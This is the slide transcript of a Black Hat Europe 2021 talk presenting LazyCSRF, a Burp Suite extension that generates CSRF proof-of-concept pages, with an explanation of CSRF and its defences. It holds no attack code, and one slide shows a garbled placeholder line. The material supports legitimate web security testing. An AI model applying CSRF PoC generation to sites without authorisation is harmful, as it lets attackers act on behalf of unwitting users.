Upgrade to Pro — share decks privately, control downloads, hide ads and more …

LazyCSRF: A More Useful CSRF PoC Generator on BurpSuite@Black Hat EUROPE 2021 Arsenal/lazyCSRF-bh2021-europe

20c5ddcad23304aed77ce8c3aa020562?s=47 @tkmru
November 11, 2021

LazyCSRF: A More Useful CSRF PoC Generator on BurpSuite@Black Hat EUROPE 2021 Arsenal/lazyCSRF-bh2021-europe

Burp Suite is an intercepting HTTP Proxy, and it is the defacto tool for performing web application security testing. The feature of Burp Suite that I like the most is `Generate CSRF PoC`. However, the function to automatically determine the content of the request is broken, and it tries to generate PoCs using `form` even for PoCs that cannot be represented by `form`, such as JSON parameters and PUT requests. In addition, multibyte characters that can be displayed in Burp Suite itself are often garbled in the generated CSRF PoC. These were the motivations for creating LazyCSRF.

- https://github.com/tkmru/lazyCSRF
- https://www.blackhat.com/eu-21/arsenal/schedule/index.html#lazycsrf-a-more-useful-csrf-poc-generator-on-burpsuite-25088

20c5ddcad23304aed77ce8c3aa020562?s=128

@tkmru

November 11, 2021
Tweet

Transcript

  1. #BHEU @BlackHatEvents LazyCSRF A more useful CSRF PoC generator on

    BurpSuite Presented by Taichi Kotake Akatsuki Inc. 1
  2. #BHEU @BlackHatEvents Who I am • Name: Taichi Kotake •

    Country: Japan • Job: Security Engineer @ Akatsuki Inc. • GitHub: tkmru 2
  3. #BHEU @BlackHatEvents Me and Black Hat • Black Hat USA

    2020 Arsenal • I talked about apk-medit • Black Hat USA 2021 Arsenal • I talked about ipa-medit • Black Hat EUROPE 2021 Arsenal ← NEW !! 3
  4. 1: Introduction to CSRF 4

  5. #BHEU @BlackHatEvents What's CSRF • CSRF(Cross-site request forgery) is a

    web app vulnerability • It allows an attacker to induce users to perform actions that they do not intend to perform 5
  6. #BHEU @BlackHatEvents What's CSRF Attacker’s Website Server Change email address,

    password etc 200 OK 6 Victim Attacker
  7. #BHEU @BlackHatEvents Conditions for a successful attack • Cookie-based session

    handling • The victim needs to have an active session with the target website • The request parameter is known to the attacker • The victim accesses a fake website created by the attacker 7
  8. #BHEU @BlackHatEvents What is the impact of CSRF • The

    attacker causes the victim to unintentionally execute the functions of the web application: • Changing the profile, email address, password, etc • Sending a message • Deleting an account • etc 8
  9. #BHEU @BlackHatEvents Preventing CSRF • Web apps need a way

    to determine if the HTTP request is legitimately generated via the application’s UI • A CSRF token is used to prevent CSRF attacks 9
  10. #BHEU @BlackHatEvents Preventing CSRF • A CSRF token is a

    secure random token • Should be unique per user session • Should be of a large enough random value to make it difficult to guess 10
  11. #BHEU @BlackHatEvents Preventing CSRF • These tokens are inserted within

    hidden parameters of HTML forms related to critical server-side operations • The web app server rejects the request if the CSRF token fails to match the test 11
  12. #BHEU @BlackHatEvents Victim Attacker Server Change the email address, password

    etc Preventing CSRF without CSRF token 12 Attacker’s Website
  13. #BHEU @BlackHatEvents Does Samesite=Lax prevent CSRF? • The SameSite attribute

    can be used to control whether and how cookies are submitted in cross-site requests • Using Samesite=Lax as a defence against CSRF has become popular recently Set-Cookie: SessionId=XXXXXXXXXXXXXXXXXXX; SameSite=Lax; 13
  14. #BHEU @BlackHatEvents Does Samesite=Lax prevent CSRF? • If the Samesite=Lax

    is set, requests from another site with POST/PATCH/PUT etc (without GET) will not include the cookie • It provides a partial defense against CSRF attacks Set-Cookie: SessionId=XXXXXXXXXXXXXXXXXXX; SameSite=Lax; 14
  15. #BHEU @BlackHatEvents Victim Attacker Server POST/PATCH/PUT request Preventing CSRF using

    Samesite=Lax GET request 15 Attacker’s Website
  16. #BHEU @BlackHatEvents Samesite=Lax is not enough • Some applications do

    implement sensitive actions using GET requests • It is not recommended to rely solely on SameSite cookies as a defense against CSRF 16
  17. #BHEU @BlackHatEvents Writing CSRF PoC HTML is a hassle •

    For pen-testing, security engineers write a PoC HTML to see whether a CSRF attack can actually be performed • The process of generating a PoC HTML is a hassle 17
  18. 2: Introduction to the Burp Suite 18

  19. #BHEU @BlackHatEvents Burp Suite is the de-facto testing tool •

    Burp Suite is a proxy tool made by PortSwigger • It is the de-facto penetration testing tool for assessing web applications 19
  20. #BHEU @BlackHatEvents Burp Suite has many useful features • Built-in

    Chromium browser for easy set-up of HTTP(S) interception • Built-in web vulnerability scanner • Only Burp Suite Professional • Extensions can be written in Java, Python or Ruby • etc 20
  21. #BHEU @BlackHatEvents Generating CSRF PoC is my favorite feature •

    Burp Suite can be used to generate a PoC CSRF attack • To access this feature, select a URL or HTTP request anywhere within Burp, and choose "Generate CSRF PoC" within "Engagement tools" in the context menu. 21
  22. #BHEU @BlackHatEvents But sometimes it's stressful • Multibyte characters(like Japanese)

    are garbled…😢 • it will try to generate PoC using form even for PoC that cannot be represented by form, such as cases using JSON for parameters or PUT requests 22
  23. 3: Introduction to LazyCSRF 23

  24. #BHEU @BlackHatEvents LazyCSRF aims to solve the problem of Burp

    • I am frustrated with the CSRF PoC generated by Burp Suite • So I created a Burp Extension called LazyCSRF to solve these problems • It's implemented in Java 24
  25. #BHEU @BlackHatEvents Features of LazyCSRF • Automatically switch to PoC

    using XMLHttpRequest • In case JSON parameters or PUT/PATCH/DELETE etc • Supports displaying multibyte characters(like Japanese) • Generating CSRF PoC with the Burp Suite Community Edition 25
  26. #BHEU @BlackHatEvents 1. Automatically switch to PoC using XHR •

    LazyCSRF automatically switches to using XHR when PoC cannot be generated with <form> • Allows JSON parameter to be sent using XHR • Allows sending a PATCH/PUT/DELETE request using XHR 26
  27. #BHEU @BlackHatEvents Burp Suite also supports PoC using XHR •

    Although it doesn't switch automatically, Burp Suite can also generate PoC for XHR 27
  28. #BHEU @BlackHatEvents 2. Support displaying multibyte characters • LazyCSRF can

    generate CSRF PoC without garbling multibyte characters • Japanese can be displayed! • This is only the case if the characters are not garbled on Proxy/Repeater tab 28
  29. #BHEU @BlackHatEvents 29 LazyCSRF Version Built-in CSRF PoC generator

  30. #BHEU @BlackHatEvents IExtensionHelpers.bytesToString ignores the encoding • IExtensionHelpers contains helper

    methods • to assist with various common tasks for Burp extensions • IExtensionHelpers.bytesToString can be used to convert data from an array of bytes into a String 30
  31. #BHEU @BlackHatEvents IExtensionHelpers.bytesToString ignores the encoding • IExtensionHelpers.bytesToString ignores the

    encoding and converts it to a string • This is probably the cause of the garbled CSRF PoC characters generated by Burp Suite 31
  32. #BHEU @BlackHatEvents 3. Generating CSRF PoC with the Burp Suite

    Community Edition • I always use the Professional Edition, so I didn't aim to do it • But, by creating a CSRF PoC generator as an extension, the Community Edition can also create CSRF PoC 32
  33. #BHEU @BlackHatEvents Installation • Download the JAR from GitHub Releases

    • https://github.com/tkmru/lazyCSRF/releases/ • In Burp Suite, go to the Extensions tab in the Extender tab, and add a new extension • Select the extension type `Java`, and specify the path of the downloaded JAR 33
  34. #BHEU @BlackHatEvents Installation • TODO: εΫγϣషΔ 34

  35. #BHEU @BlackHatEvents Usage • You can generate a CSRF PoC

    by selecting Extensions →ɹ LazyCSRF → Generate CSRF PoC By LazyCSRF from the menu that shows up by right-clicking on Proxy and Repeater 35
  36. #BHEU @BlackHatEvents Usage 36

  37. #BHEU @BlackHatEvents 37

  38. #BHEU @BlackHatEvents Future Work • Burp Suite hosts the generated

    PoC on localhost, but LazyCSRF cannot go that far • Displaying HTML with colors • I hope to implement them in LazyCSRF in the future 38
  39. 4: TIPS for Burp extension development 39

  40. #BHEU @BlackHatEvents How to use GitHub actions for Burp Extension

    development? • GitHub Actions is a CI service by GitHub • It is free to use for public repositories • There are still very few GitHub Actions on the Internet that use it for Burp Extension development. 40
  41. #BHEU @BlackHatEvents How to use GitHub actions for Burp Extension

    development? • LazyCSRF allows you to build with mvn command • When a tagged commit is uploaded to GitHub, the build runs via GitHub Actions and automatically registers the JAR to GitHub Releases 41
  42. #BHEU @BlackHatEvents Code Template for Burp Extension Development • While

    creating LazyCSRF, I also created a code template • If you are currently developing Burp extensions, please use it! • https://github.com/tkmru/BurpSuiteExtensionTemplate 42
  43. #BHEU @BlackHatEvents 43

  44. 5: Summary 44

  45. #BHEU @BlackHatEvents Summary • LazyCSRF eases CSRF testing • LazyCSRF

    is still a rough tool, so I want to make it more complete • I hope LazyCSRF will become the de facto standard for security testing! 45
  46. #BHEU @BlackHatEvents Thank You!! https://github.com/tkmru/lazyCSRF 46

  47. #BHEU @BlackHatEvents References • https://portswigger.net/web-security/csrf • https://portswigger.net/web-security/csrf/samesite-cookies • https://www.synopsys.com/glossary/what-is-csrf.html 47